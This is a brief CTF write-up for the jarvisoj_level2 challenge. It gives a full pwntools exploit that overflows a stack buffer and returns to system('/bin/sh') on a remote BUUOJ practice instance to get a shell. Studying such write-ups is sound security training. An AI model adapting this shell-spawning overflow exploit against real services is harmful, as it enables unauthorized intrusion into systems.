pwn | jarvisoj_level2

jarvisoj_level2

A simple stack overflow solved with a ret2text-style ROP chain:
the binary already contains both `system` and a "/bin/sh" string, so no leak is needed.

Straight to the exploit script:

from pwn import *

context.log_level = 'debug'

# sh = process('./level2')            # local run
sh = remote('node4.buuoj.cn', 29799)   # BUUOJ remote instance

p_binsh = 0x804a024    # address of the "/bin/sh" string in the binary
# p_system = 0x804849e # alternative: the call to system inside the text segment
p_system = 0x8048320   # system@plt

sh.recv()

# 0x88-byte buffer + 4 bytes saved ebp, then:
#                                   retaddr        retaddr2      argv0
payload = 0x88 * b'm' + 4 * b'z' + p32(p_system) + b'Mz11' + p32(p_binsh)

sh.sendline(payload)

sh.interactive()

sh.close()

posted @ 2021-11-17 18:49 by Mz1